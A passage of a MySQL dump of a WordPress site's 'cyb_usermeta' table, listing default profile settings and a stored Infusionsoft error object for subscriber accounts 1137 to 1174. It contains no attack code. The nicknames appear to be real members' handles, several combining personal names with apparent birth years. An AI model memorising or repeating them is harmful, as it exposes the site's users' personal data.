(14894, 1137, 'admin_color', 'fresh'),
(14895, 1137, 'use_ssl', '0'),
(14896, 1137, 'show_admin_bar_front', 'true'),
(14897, 1137, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14898, 1137, 'cyb_user_level', '0'),
(14899, 1137, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14900, 1137, 'default_password_nag', '1'),
(14901, 1138, 'nickname', 'superak311982'),
(14902, 1138, 'first_name', ''),
(14903, 1138, 'last_name', ''),
(14904, 1138, 'description', ''),
(14905, 1138, 'rich_editing', 'true'),
(14906, 1138, 'comment_shortcuts', 'false'),
(14907, 1138, 'admin_color', 'fresh'),
(14908, 1138, 'use_ssl', '0'),
(14909, 1138, 'show_admin_bar_front', 'true'),
(14910, 1138, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14911, 1138, 'cyb_user_level', '0'),
(14912, 1138, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14913, 1138, 'default_password_nag', '1'),
(14914, 1139, 'nickname', 'sf22431993'),
(14915, 1139, 'first_name', ''),
(14916, 1139, 'last_name', ''),
(14917, 1139, 'description', ''),
(14918, 1139, 'rich_editing', 'true'),
(14919, 1139, 'comment_shortcuts', 'false'),
(14920, 1139, 'admin_color', 'fresh'),
(14921, 1139, 'use_ssl', '0'),
(14922, 1139, 'show_admin_bar_front', 'true'),
(14923, 1139, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14924, 1139, 'cyb_user_level', '0'),
(14925, 1139, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14926, 1139, 'default_password_nag', '1'),
(14927, 1140, 'nickname', 'jahensley11969'),
(14928, 1140, 'first_name', ''),
(14929, 1140, 'last_name', ''),
(14930, 1140, 'description', ''),
(14931, 1140, 'rich_editing', 'true'),
(14932, 1140, 'comment_shortcuts', 'false'),
(14933, 1140, 'admin_color', 'fresh'),
(14934, 1140, 'use_ssl', '0'),
(14935, 1140, 'show_admin_bar_front', 'true'),
(14936, 1140, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14937, 1140, 'cyb_user_level', '0'),
(14938, 1140, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14939, 1140, 'default_password_nag', '1'),
(14940, 1141, 'nickname', 'bettythefoodchick1980'),
(14941, 1141, 'first_name', ''),
(14942, 1141, 'last_name', ''),
(14943, 1141, 'description', ''),
(14944, 1141, 'rich_editing', 'true'),
(14945, 1141, 'comment_shortcuts', 'false'),
(14946, 1141, 'admin_color', 'fresh'),
(14947, 1141, 'use_ssl', '0'),
(14948, 1141, 'show_admin_bar_front', 'true'),
(14949, 1141, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14950, 1141, 'cyb_user_level', '0'),
(14951, 1141, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14952, 1141, 'default_password_nag', '1'),
(14953, 1142, 'nickname', 'mljacobs141951'),
(14954, 1142, 'first_name', ''),
(14955, 1142, 'last_name', ''),
(14956, 1142, 'description', ''),
(14957, 1142, 'rich_editing', 'true'),
(14958, 1142, 'comment_shortcuts', 'false'),
(14959, 1142, 'admin_color', 'fresh'),
(14960, 1142, 'use_ssl', '0'),
(14961, 1142, 'show_admin_bar_front', 'true'),
(14962, 1142, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14963, 1142, 'cyb_user_level', '0'),
(14964, 1142, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14965, 1142, 'default_password_nag', '1'),
(14966, 1143, 'nickname', 'eringloth2006'),
(14967, 1143, 'first_name', ''),
(14968, 1143, 'last_name', ''),
(14969, 1143, 'description', ''),
(14970, 1143, 'rich_editing', 'true'),
(14971, 1143, 'comment_shortcuts', 'false'),
(14972, 1143, 'admin_color', 'fresh'),
(14973, 1143, 'use_ssl', '0'),
(14974, 1143, 'show_admin_bar_front', 'true'),
(14975, 1143, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14976, 1143, 'cyb_user_level', '0'),
(14977, 1143, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14978, 1143, 'default_password_nag', '1'),
(14979, 1144, 'nickname', 'dljohnson7321983'),
(14980, 1144, 'first_name', ''),
(14981, 1144, 'last_name', ''),
(14982, 1144, 'description', ''),
(14983, 1144, 'rich_editing', 'true'),
(14984, 1144, 'comment_shortcuts', 'false'),
(14985, 1144, 'admin_color', 'fresh'),
(14986, 1144, 'use_ssl', '0'),
(14987, 1144, 'show_admin_bar_front', 'true'),
(14988, 1144, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(14989, 1144, 'cyb_user_level', '0'),
(14990, 1144, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(14991, 1144, 'default_password_nag', '1'),
(14992, 1145, 'nickname', 'melissa0516511975'),
(14993, 1145, 'first_name', ''),
(14994, 1145, 'last_name', ''),
(14995, 1145, 'description', ''),
(14996, 1145, 'rich_editing', 'true'),
(14997, 1145, 'comment_shortcuts', 'false'),
(14998, 1145, 'admin_color', 'fresh'),
(14999, 1145, 'use_ssl', '0'),
(15000, 1145, 'show_admin_bar_front', 'true'),
(15001, 1145, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15002, 1145, 'cyb_user_level', '0');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(15003, 1145, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15004, 1145, 'default_password_nag', '1'),
(15005, 1146, 'nickname', 'laherbine1982'),
(15006, 1146, 'first_name', ''),
(15007, 1146, 'last_name', ''),
(15008, 1146, 'description', ''),
(15009, 1146, 'rich_editing', 'true'),
(15010, 1146, 'comment_shortcuts', 'false'),
(15011, 1146, 'admin_color', 'fresh'),
(15012, 1146, 'use_ssl', '0'),
(15013, 1146, 'show_admin_bar_front', 'true'),
(15014, 1146, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15015, 1146, 'cyb_user_level', '0'),
(15016, 1146, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15017, 1146, 'default_password_nag', '1'),
(15018, 1147, 'nickname', 'jbravo101957'),
(15019, 1147, 'first_name', ''),
(15020, 1147, 'last_name', ''),
(15021, 1147, 'description', ''),
(15022, 1147, 'rich_editing', 'true'),
(15023, 1147, 'comment_shortcuts', 'false'),
(15024, 1147, 'admin_color', 'fresh'),
(15025, 1147, 'use_ssl', '0'),
(15026, 1147, 'show_admin_bar_front', 'true'),
(15027, 1147, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15028, 1147, 'cyb_user_level', '0'),
(15029, 1147, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15030, 1147, 'default_password_nag', '1'),
(15031, 1148, 'nickname', 'dewitt.tillett1988'),
(15032, 1148, 'first_name', ''),
(15033, 1148, 'last_name', ''),
(15034, 1148, 'description', ''),
(15035, 1148, 'rich_editing', 'true'),
(15036, 1148, 'comment_shortcuts', 'false'),
(15037, 1148, 'admin_color', 'fresh'),
(15038, 1148, 'use_ssl', '0'),
(15039, 1148, 'show_admin_bar_front', 'true'),
(15040, 1148, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15041, 1148, 'cyb_user_level', '0'),
(15042, 1148, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15043, 1148, 'default_password_nag', '1'),
(15044, 1149, 'nickname', 'oliviapaige77731957'),
(15045, 1149, 'first_name', ''),
(15046, 1149, 'last_name', ''),
(15047, 1149, 'description', ''),
(15048, 1149, 'rich_editing', 'true'),
(15049, 1149, 'comment_shortcuts', 'false'),
(15050, 1149, 'admin_color', 'fresh'),
(15051, 1149, 'use_ssl', '0'),
(15052, 1149, 'show_admin_bar_front', 'true'),
(15053, 1149, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15054, 1149, 'cyb_user_level', '0'),
(15055, 1149, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15056, 1149, 'default_password_nag', '1'),
(15057, 1150, 'nickname', 'douglas.schicho1985'),
(15058, 1150, 'first_name', ''),
(15059, 1150, 'last_name', ''),
(15060, 1150, 'description', ''),
(15061, 1150, 'rich_editing', 'true'),
(15062, 1150, 'comment_shortcuts', 'false'),
(15063, 1150, 'admin_color', 'fresh'),
(15064, 1150, 'use_ssl', '0'),
(15065, 1150, 'show_admin_bar_front', 'true'),
(15066, 1150, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15067, 1150, 'cyb_user_level', '0'),
(15068, 1150, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15069, 1150, 'default_password_nag', '1'),
(15070, 1151, 'nickname', 's.cunney2003'),
(15071, 1151, 'first_name', ''),
(15072, 1151, 'last_name', ''),
(15073, 1151, 'description', ''),
(15074, 1151, 'rich_editing', 'true'),
(15075, 1151, 'comment_shortcuts', 'false'),
(15076, 1151, 'admin_color', 'fresh'),
(15077, 1151, 'use_ssl', '0'),
(15078, 1151, 'show_admin_bar_front', 'true'),
(15079, 1151, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15080, 1151, 'cyb_user_level', '0'),
(15081, 1151, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15082, 1151, 'default_password_nag', '1'),
(15083, 1152, 'nickname', 'alexisnewmanes1952'),
(15084, 1152, 'first_name', ''),
(15085, 1152, 'last_name', ''),
(15086, 1152, 'description', ''),
(15087, 1152, 'rich_editing', 'true'),
(15088, 1152, 'comment_shortcuts', 'false'),
(15089, 1152, 'admin_color', 'fresh'),
(15090, 1152, 'use_ssl', '0'),
(15091, 1152, 'show_admin_bar_front', 'true'),
(15092, 1152, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15093, 1152, 'cyb_user_level', '0'),
(15094, 1152, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15095, 1152, 'default_password_nag', '1'),
(15096, 1153, 'nickname', 'daisoa1952'),
(15097, 1153, 'first_name', ''),
(15098, 1153, 'last_name', ''),
(15099, 1153, 'description', ''),
(15100, 1153, 'rich_editing', 'true'),
(15101, 1153, 'comment_shortcuts', 'false'),
(15102, 1153, 'admin_color', 'fresh'),
(15103, 1153, 'use_ssl', '0'),
(15104, 1153, 'show_admin_bar_front', 'true'),
(15105, 1153, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15106, 1153, 'cyb_user_level', '0'),
(15107, 1153, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15108, 1153, 'default_password_nag', '1'),
(15109, 1154, 'nickname', 'dave.methvin1950'),
(15110, 1154, 'first_name', ''),
(15111, 1154, 'last_name', ''),
(15112, 1154, 'description', ''),
(15113, 1154, 'rich_editing', 'true'),
(15114, 1154, 'comment_shortcuts', 'false'),
(15115, 1154, 'admin_color', 'fresh'),
(15116, 1154, 'use_ssl', '0'),
(15117, 1154, 'show_admin_bar_front', 'true'),
(15118, 1154, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15119, 1154, 'cyb_user_level', '0'),
(15120, 1154, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15121, 1154, 'default_password_nag', '1'),
(15122, 1155, 'nickname', 'bubbyluvsgod2008'),
(15123, 1155, 'first_name', ''),
(15124, 1155, 'last_name', ''),
(15125, 1155, 'description', ''),
(15126, 1155, 'rich_editing', 'true'),
(15127, 1155, 'comment_shortcuts', 'false'),
(15128, 1155, 'admin_color', 'fresh'),
(15129, 1155, 'use_ssl', '0'),
(15130, 1155, 'show_admin_bar_front', 'true'),
(15131, 1155, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15132, 1155, 'cyb_user_level', '0'),
(15133, 1155, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15134, 1155, 'default_password_nag', '1'),
(15135, 1156, 'nickname', 'peco13651970'),
(15136, 1156, 'first_name', ''),
(15137, 1156, 'last_name', ''),
(15138, 1156, 'description', ''),
(15139, 1156, 'rich_editing', 'true'),
(15140, 1156, 'comment_shortcuts', 'false'),
(15141, 1156, 'admin_color', 'fresh'),
(15142, 1156, 'use_ssl', '0'),
(15143, 1156, 'show_admin_bar_front', 'true'),
(15144, 1156, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15145, 1156, 'cyb_user_level', '0'),
(15146, 1156, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15147, 1156, 'default_password_nag', '1'),
(15148, 1157, 'nickname', 'mankag2007'),
(15149, 1157, 'first_name', ''),
(15150, 1157, 'last_name', ''),
(15151, 1157, 'description', ''),
(15152, 1157, 'rich_editing', 'true'),
(15153, 1157, 'comment_shortcuts', 'false'),
(15154, 1157, 'admin_color', 'fresh'),
(15155, 1157, 'use_ssl', '0'),
(15156, 1157, 'show_admin_bar_front', 'true'),
(15157, 1157, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15158, 1157, 'cyb_user_level', '0'),
(15159, 1157, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15160, 1157, 'default_password_nag', '1'),
(15161, 1158, 'nickname', 'pctelck1965'),
(15162, 1158, 'first_name', ''),
(15163, 1158, 'last_name', ''),
(15164, 1158, 'description', ''),
(15165, 1158, 'rich_editing', 'true'),
(15166, 1158, 'comment_shortcuts', 'false'),
(15167, 1158, 'admin_color', 'fresh'),
(15168, 1158, 'use_ssl', '0'),
(15169, 1158, 'show_admin_bar_front', 'true'),
(15170, 1158, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15171, 1158, 'cyb_user_level', '0'),
(15172, 1158, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15173, 1158, 'default_password_nag', '1'),
(15174, 1159, 'nickname', 'michael.cubero1121973'),
(15175, 1159, 'first_name', ''),
(15176, 1159, 'last_name', ''),
(15177, 1159, 'description', ''),
(15178, 1159, 'rich_editing', 'true'),
(15179, 1159, 'comment_shortcuts', 'false'),
(15180, 1159, 'admin_color', 'fresh'),
(15181, 1159, 'use_ssl', '0'),
(15182, 1159, 'show_admin_bar_front', 'true'),
(15183, 1159, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15184, 1159, 'cyb_user_level', '0'),
(15185, 1159, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15186, 1159, 'default_password_nag', '1'),
(15187, 1160, 'nickname', 'clayturner691963'),
(15188, 1160, 'first_name', ''),
(15189, 1160, 'last_name', ''),
(15190, 1160, 'description', ''),
(15191, 1160, 'rich_editing', 'true'),
(15192, 1160, 'comment_shortcuts', 'false'),
(15193, 1160, 'admin_color', 'fresh'),
(15194, 1160, 'use_ssl', '0'),
(15195, 1160, 'show_admin_bar_front', 'true'),
(15196, 1160, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15197, 1160, 'cyb_user_level', '0'),
(15198, 1160, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15199, 1160, 'default_password_nag', '1'),
(15200, 1161, 'nickname', 'jad12471978'),
(15201, 1161, 'first_name', ''),
(15202, 1161, 'last_name', ''),
(15203, 1161, 'description', ''),
(15204, 1161, 'rich_editing', 'true'),
(15205, 1161, 'comment_shortcuts', 'false'),
(15206, 1161, 'admin_color', 'fresh'),
(15207, 1161, 'use_ssl', '0'),
(15208, 1161, 'show_admin_bar_front', 'true'),
(15209, 1161, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15210, 1161, 'cyb_user_level', '0'),
(15211, 1161, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15212, 1161, 'default_password_nag', '1'),
(15213, 1162, 'nickname', 'jlrowe24961959'),
(15214, 1162, 'first_name', ''),
(15215, 1162, 'last_name', ''),
(15216, 1162, 'description', ''),
(15217, 1162, 'rich_editing', 'true'),
(15218, 1162, 'comment_shortcuts', 'false'),
(15219, 1162, 'admin_color', 'fresh'),
(15220, 1162, 'use_ssl', '0'),
(15221, 1162, 'show_admin_bar_front', 'true'),
(15222, 1162, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15223, 1162, 'cyb_user_level', '0'),
(15224, 1162, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15225, 1162, 'default_password_nag', '1'),
(15226, 1163, 'nickname', 'mendicant1231989'),
(15227, 1163, 'first_name', ''),
(15228, 1163, 'last_name', ''),
(15229, 1163, 'description', ''),
(15230, 1163, 'rich_editing', 'true'),
(15231, 1163, 'comment_shortcuts', 'false'),
(15232, 1163, 'admin_color', 'fresh'),
(15233, 1163, 'use_ssl', '0'),
(15234, 1163, 'show_admin_bar_front', 'true'),
(15235, 1163, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15236, 1163, 'cyb_user_level', '0'),
(15237, 1163, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15238, 1163, 'default_password_nag', '1'),
(15239, 1164, 'nickname', 'adeguzman1950'),
(15240, 1164, 'first_name', ''),
(15241, 1164, 'last_name', ''),
(15242, 1164, 'description', ''),
(15243, 1164, 'rich_editing', 'true'),
(15244, 1164, 'comment_shortcuts', 'false'),
(15245, 1164, 'admin_color', 'fresh'),
(15246, 1164, 'use_ssl', '0'),
(15247, 1164, 'show_admin_bar_front', 'true'),
(15248, 1164, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15249, 1164, 'cyb_user_level', '0'),
(15250, 1164, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15251, 1164, 'default_password_nag', '1'),
(15252, 1165, 'nickname', 'savagelettuce1972'),
(15253, 1165, 'first_name', ''),
(15254, 1165, 'last_name', ''),
(15255, 1165, 'description', ''),
(15256, 1165, 'rich_editing', 'true'),
(15257, 1165, 'comment_shortcuts', 'false'),
(15258, 1165, 'admin_color', 'fresh'),
(15259, 1165, 'use_ssl', '0'),
(15260, 1165, 'show_admin_bar_front', 'true'),
(15261, 1165, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15262, 1165, 'cyb_user_level', '0'),
(15263, 1165, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15264, 1165, 'default_password_nag', '1'),
(15265, 1166, 'nickname', 'mvodzak1953'),
(15266, 1166, 'first_name', ''),
(15267, 1166, 'last_name', ''),
(15268, 1166, 'description', ''),
(15269, 1166, 'rich_editing', 'true'),
(15270, 1166, 'comment_shortcuts', 'false'),
(15271, 1166, 'admin_color', 'fresh'),
(15272, 1166, 'use_ssl', '0'),
(15273, 1166, 'show_admin_bar_front', 'true'),
(15274, 1166, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15275, 1166, 'cyb_user_level', '0'),
(15276, 1166, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15277, 1166, 'default_password_nag', '1'),
(15278, 1167, 'nickname', 'mikekemp901987'),
(15279, 1167, 'first_name', ''),
(15280, 1167, 'last_name', ''),
(15281, 1167, 'description', ''),
(15282, 1167, 'rich_editing', 'true'),
(15283, 1167, 'comment_shortcuts', 'false'),
(15284, 1167, 'admin_color', 'fresh'),
(15285, 1167, 'use_ssl', '0'),
(15286, 1167, 'show_admin_bar_front', 'true'),
(15287, 1167, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15288, 1167, 'cyb_user_level', '0'),
(15289, 1167, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15290, 1167, 'default_password_nag', '1'),
(15291, 1168, 'nickname', 'tania_dc1953'),
(15292, 1168, 'first_name', ''),
(15293, 1168, 'last_name', ''),
(15294, 1168, 'description', ''),
(15295, 1168, 'rich_editing', 'true'),
(15296, 1168, 'comment_shortcuts', 'false'),
(15297, 1168, 'admin_color', 'fresh'),
(15298, 1168, 'use_ssl', '0'),
(15299, 1168, 'show_admin_bar_front', 'true'),
(15300, 1168, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15301, 1168, 'cyb_user_level', '0'),
(15302, 1168, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15303, 1168, 'default_password_nag', '1'),
(15304, 1169, 'nickname', 'ted.mattingly10311993'),
(15305, 1169, 'first_name', ''),
(15306, 1169, 'last_name', ''),
(15307, 1169, 'description', ''),
(15308, 1169, 'rich_editing', 'true'),
(15309, 1169, 'comment_shortcuts', 'false'),
(15310, 1169, 'admin_color', 'fresh'),
(15311, 1169, 'use_ssl', '0'),
(15312, 1169, 'show_admin_bar_front', 'true'),
(15313, 1169, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15314, 1169, 'cyb_user_level', '0'),
(15315, 1169, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15316, 1169, 'default_password_nag', '1'),
(15317, 1170, 'nickname', 'salvadormurillo211976'),
(15318, 1170, 'first_name', ''),
(15319, 1170, 'last_name', ''),
(15320, 1170, 'description', ''),
(15321, 1170, 'rich_editing', 'true'),
(15322, 1170, 'comment_shortcuts', 'false'),
(15323, 1170, 'admin_color', 'fresh'),
(15324, 1170, 'use_ssl', '0'),
(15325, 1170, 'show_admin_bar_front', 'true'),
(15326, 1170, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15327, 1170, 'cyb_user_level', '0'),
(15328, 1170, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15329, 1170, 'default_password_nag', '1'),
(15330, 1171, 'nickname', 'dwootenmd2010'),
(15331, 1171, 'first_name', ''),
(15332, 1171, 'last_name', ''),
(15333, 1171, 'description', ''),
(15334, 1171, 'rich_editing', 'true'),
(15335, 1171, 'comment_shortcuts', 'false'),
(15336, 1171, 'admin_color', 'fresh'),
(15337, 1171, 'use_ssl', '0'),
(15338, 1171, 'show_admin_bar_front', 'true'),
(15339, 1171, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15340, 1171, 'cyb_user_level', '0'),
(15341, 1171, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15342, 1171, 'default_password_nag', '1'),
(15343, 1172, 'nickname', 'hleong20001997'),
(15344, 1172, 'first_name', ''),
(15345, 1172, 'last_name', ''),
(15346, 1172, 'description', ''),
(15347, 1172, 'rich_editing', 'true'),
(15348, 1172, 'comment_shortcuts', 'false'),
(15349, 1172, 'admin_color', 'fresh'),
(15350, 1172, 'use_ssl', '0'),
(15351, 1172, 'show_admin_bar_front', 'true'),
(15352, 1172, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15353, 1172, 'cyb_user_level', '0'),
(15354, 1172, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15355, 1172, 'default_password_nag', '1'),
(15356, 1173, 'nickname', 'ekobb1987'),
(15357, 1173, 'first_name', ''),
(15358, 1173, 'last_name', ''),
(15359, 1173, 'description', ''),
(15360, 1173, 'rich_editing', 'true'),
(15361, 1173, 'comment_shortcuts', 'false'),
(15362, 1173, 'admin_color', 'fresh'),
(15363, 1173, 'use_ssl', '0'),
(15364, 1173, 'show_admin_bar_front', 'true'),
(15365, 1173, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15366, 1173, 'cyb_user_level', '0'),
(15367, 1173, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15368, 1173, 'default_password_nag', '1'),
(15369, 1174, 'nickname', 'mdcrane092004'),
(15370, 1174, 'first_name', ''),
(15371, 1174, 'last_name', ''),
(15372, 1174, 'description', ''),
(15373, 1174, 'rich_editing', 'true'),
(15374, 1174, 'comment_shortcuts', 'false'),
(15375, 1174, 'admin_color', 'fresh'),
(15376, 1174, 'use_ssl', '0'),
(15377, 1174, 'show_admin_bar_front', 'true'),
(15378, 1174, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(15379, 1174, 'cyb_user_level', '0'),
(15380, 1174, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(15381, 1174, 'default_password_nag', '1'),
